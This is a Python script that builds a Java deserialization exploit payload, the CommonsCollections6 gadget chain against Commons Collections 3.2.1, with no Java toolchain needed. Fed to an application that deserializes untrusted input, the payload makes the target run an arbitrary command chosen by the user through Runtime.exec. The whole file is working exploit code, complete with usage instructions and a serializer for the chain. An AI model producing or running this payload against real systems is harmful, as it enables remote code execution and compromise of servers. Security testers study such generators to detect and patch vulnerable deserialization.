#!/usr/bin/env python3
"""
Pure-Python builder for a Java serialization gadget chain (CommonsCollections6)
targeting Commons Collections 3.2.1 on the target classpath. No Java toolchain
or ysoserial jar is required to build the payload.

Trigger (fires entirely inside ObjectInputStream.readObject, JDK17-safe):

  java.util.HashMap.readObject()
    -> hash(key) -> key.hashCode()         (key = TiedMapEntry)
    -> TiedMapEntry.hashCode() -> getValue()
    -> map.get(key)                        (map = LazyMap)
    -> LazyMap.get() -> factory.transform() (factory = ChainedTransformer)
       ConstantTransformer(Runtime.class)
       InvokerTransformer("getMethod",...) -> Runtime.getMethod("getRuntime")
       InvokerTransformer("invoke",...)    -> Runtime.getRuntime()
       InvokerTransformer("exec",...)      -> rt.exec(cmdArray)

serialVersionUIDs and field orders were read directly off Commons Collections
3.2.1 (ObjectStreamClass.lookup) and the JDK17 runtime classes.

Usage:
  python3 gadget.py sh -c 'touch /tmp/x'  > payload.bin
"""
import sys
import struct

STREAM_MAGIC = 0xACED
STREAM_VERSION = 5
TC_NULL = 0x70
TC_REFERENCE = 0x71
TC_CLASSDESC = 0x72
TC_OBJECT = 0x73
TC_STRING = 0x74
TC_ARRAY = 0x75
TC_CLASS = 0x76
TC_BLOCKDATA = 0x77
TC_ENDBLOCKDATA = 0x78
baseWireHandle = 0x7E0000

SC_WRITE_METHOD = 0x01
SC_SERIALIZABLE = 0x02

# serialVersionUIDs (read off CC 3.2.1 / JDK17)
UID = {
    "java.util.HashMap": 362498820763181265,
    "org.apache.commons.collections.keyvalue.TiedMapEntry": -8453869361373831205,
    "org.apache.commons.collections.map.LazyMap": 7990956402564206740,
    "org.apache.commons.collections.functors.ChainedTransformer": 3514945074733160196,
    "[Lorg.apache.commons.collections.Transformer;": -4803604734341277543,
    "org.apache.commons.collections.functors.ConstantTransformer": 6374440726369055124,
    "org.apache.commons.collections.functors.InvokerTransformer": -8653385846894047688,
    "[Ljava.lang.Object;": -8012369246846506644,
    "[Ljava.lang.String;": -5921575005990323385,
    "[Ljava.lang.Class;": -6118465897992725863,
}


class Ser:
    def __init__(self):
        self.buf = bytearray()
        self.next_handle = baseWireHandle
        self.handles = {}
        self.buf += struct.pack(">HH", STREAM_MAGIC, STREAM_VERSION)

    def _assign(self, key=None):
        h = self.next_handle
        self.next_handle += 1
        if key is not None:
            self.handles[key] = h
        return h

    def u1(self, v):
        self.buf.append(v & 0xFF)

    def u2(self, v):
        self.buf += struct.pack(">H", v)

    def i4(self, v):
        self.buf += struct.pack(">i", v)

    def i8(self, v):
        self.buf += struct.pack(">q", v)

    def utf(self, s):
        b = s.encode("utf-8")
        self.buf += struct.pack(">H", len(b)) + b

    def string(self, s):
        key = ("str", s)
        if key in self.handles:
            self.u1(TC_REFERENCE)
            self.i4(self.handles[key])
            return
        self.u1(TC_STRING)
        self._assign(key)
        self.utf(s)


def class_desc(s, name, flags, fields):
    """fields: list of (typechar, fieldname[, classname_string]).
    super is always java.lang.Object (TC_NULL) for our gadget classes."""
    key = ("cd", name)
    if key in s.handles:
        s.u1(TC_REFERENCE)
        s.i4(s.handles[key])
        return
    s.u1(TC_CLASSDESC)
    s.utf(name)
    s.i8(UID.get(name, 0))
    s._assign(key)
    s.u1(flags)
    s.u2(len(fields))
    for f in fields:
        tc = f[0]
        s.u1(ord(tc))
        s.utf(f[1])
        if tc in ("L", "["):
            s.string(f[2])
    s.u1(TC_ENDBLOCKDATA)
    s.u1(TC_NULL)  # no superclass desc


def obj_handle(s):
    return s._assign()


# ----------------------------------------------------------------------------


def write_hashmap_with_key(s, key_writer):
    """Top object: HashMap with one entry whose KEY triggers .hashCode().
    HashMap.readObject: defaultReadObject(loadFactor,threshold) then blockdata
    (buckets:int, size:int) then for each entry readObject(key) readObject(value)
    and putVal(hash(key)...) -> key.hashCode()."""
    s.u1(TC_OBJECT)
    class_desc(
        s, "java.util.HashMap", SC_SERIALIZABLE | SC_WRITE_METHOD,
        [("F", "loadFactor"), ("I", "threshold")],
    )
    obj_handle(s)
    s.buf += struct.pack(">f", 0.75)   # loadFactor
    s.i4(12)                           # threshold
    s.u1(TC_BLOCKDATA)
    s.u1(8)
    s.i4(16)                           # buckets
    s.i4(1)                            # size = 1 entry
    # entries are written by writeObject as part of the object-annotation, i.e.
    # BEFORE the terminating TC_ENDBLOCKDATA.
    key_writer(s)                      # key (TiedMapEntry)
    s.string("v")                      # value
    s.u1(TC_ENDBLOCKDATA)


def write_tied_map_entry(s, cmd_array):
    s.u1(TC_OBJECT)
    class_desc(
        s, "org.apache.commons.collections.keyvalue.TiedMapEntry",
        SC_SERIALIZABLE,
        [("L", "key", "Ljava/lang/Object;"), ("L", "map", "Ljava/util/Map;")],
    )
    obj_handle(s)
    s.string("k")                  # key field
    write_lazy_map(s, cmd_array)   # map field


def write_lazy_map(s, cmd_array):
    # LazyMap: SC_WRITE_METHOD. defaultWriteObject -> field 'factory', then
    # writeObject(map) -> the decorated HashMap, then TC_ENDBLOCKDATA.
    s.u1(TC_OBJECT)
    class_desc(
        s, "org.apache.commons.collections.map.LazyMap",
        SC_SERIALIZABLE | SC_WRITE_METHOD,
        [("L", "factory", "Lorg/apache/commons/collections/Transformer;")],
    )
    obj_handle(s)
    write_chained_transformer(s, cmd_array)  # factory
    write_empty_hashmap(s)                   # decorated map (object annotation)
    s.u1(TC_ENDBLOCKDATA)


def write_empty_hashmap(s):
    s.u1(TC_OBJECT)
    class_desc(
        s, "java.util.HashMap", SC_SERIALIZABLE | SC_WRITE_METHOD,
        [("F", "loadFactor"), ("I", "threshold")],
    )
    obj_handle(s)
    s.buf += struct.pack(">f", 0.75)
    s.i4(12)
    s.u1(TC_BLOCKDATA)
    s.u1(8)
    s.i4(16)
    s.i4(0)        # size 0 -> empty -> containsKey(key) false
    s.u1(TC_ENDBLOCKDATA)


def write_chained_transformer(s, cmd_array):
    s.u1(TC_OBJECT)
    class_desc(
        s, "org.apache.commons.collections.functors.ChainedTransformer",
        SC_SERIALIZABLE,
        [("[", "iTransformers", "[Lorg/apache/commons/collections/Transformer;")],
    )
    obj_handle(s)
    write_transformer_array(s, cmd_array)


def write_transformer_array(s, cmd_array):
    s.u1(TC_ARRAY)
    class_desc(s, "[Lorg.apache.commons.collections.Transformer;",
               SC_SERIALIZABLE, [])
    obj_handle(s)
    ts = build_transformers(cmd_array)
    s.i4(len(ts))
    for t in ts:
        t(s)


def build_transformers(cmd_array):
    out = []

    def t_const(s):
        s.u1(TC_OBJECT)
        class_desc(s, "org.apache.commons.collections.functors.ConstantTransformer",
                   SC_SERIALIZABLE, [("L", "iConstant", "Ljava/lang/Object;")])
        obj_handle(s)
        write_class_object(s, "java.lang.Runtime")
    out.append(t_const)

    out.append(make_invoker("getMethod",
        ["java.lang.String", "[Ljava.lang.Class;"],
        [("str", "getRuntime"), ("classarr", [])]))
    out.append(make_invoker("invoke",
        ["java.lang.Object", "[Ljava.lang.Object;"],
        [("null", None), ("objarr", [])]))
    out.append(make_invoker("exec",
        ["[Ljava.lang.String;"],
        [("strarr", cmd_array)]))
    return out


def make_invoker(method_name, param_types, args):
    def t(s):
        s.u1(TC_OBJECT)
        class_desc(s, "org.apache.commons.collections.functors.InvokerTransformer",
                   SC_SERIALIZABLE,
                   [("L", "iArgs", "[Ljava/lang/Object;"),
                    ("L", "iMethodName", "Ljava/lang/String;"),
                    ("L", "iParamTypes", "[Ljava/lang/Class;")])
        obj_handle(s)
        write_object_array(s, args)        # iArgs
        s.string(method_name)              # iMethodName
        write_class_array(s, param_types)  # iParamTypes
    return t


def write_object_array(s, args):
    s.u1(TC_ARRAY)
    class_desc(s, "[Ljava.lang.Object;", SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(args))
    for kind, val in args:
        if kind == "str":
            s.string(val)
        elif kind == "null":
            s.u1(TC_NULL)
        elif kind == "classarr":
            write_class_array(s, val)
        elif kind == "objarr":
            write_object_array(s, val)
        elif kind == "strarr":
            write_string_array(s, val)
        else:
            raise ValueError(kind)


def write_string_array(s, items):
    s.u1(TC_ARRAY)
    class_desc(s, "[Ljava.lang.String;", SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(items))
    for it in items:
        s.string(it)


def write_class_array(s, class_names):
    s.u1(TC_ARRAY)
    class_desc(s, "[Ljava.lang.Class;", SC_SERIALIZABLE, [])
    obj_handle(s)
    s.i4(len(class_names))
    for cn in class_names:
        write_class_object(s, cn)


def write_class_object(s, class_name):
    s.u1(TC_CLASS)
    class_desc(s, class_name, 0, [])
    obj_handle(s)


def build(cmd_array):
    s = Ser()
    write_hashmap_with_key(s, lambda ss: write_tied_map_entry(ss, cmd_array))
    return bytes(s.buf)


def main():
    if len(sys.argv) < 2:
        sys.stderr.write("usage: gadget.py <argv0> [argv1 ...]\n")
        sys.exit(2)
    sys.stdout.buffer.write(build(sys.argv[1:]))


if __name__ == "__main__":
    main()
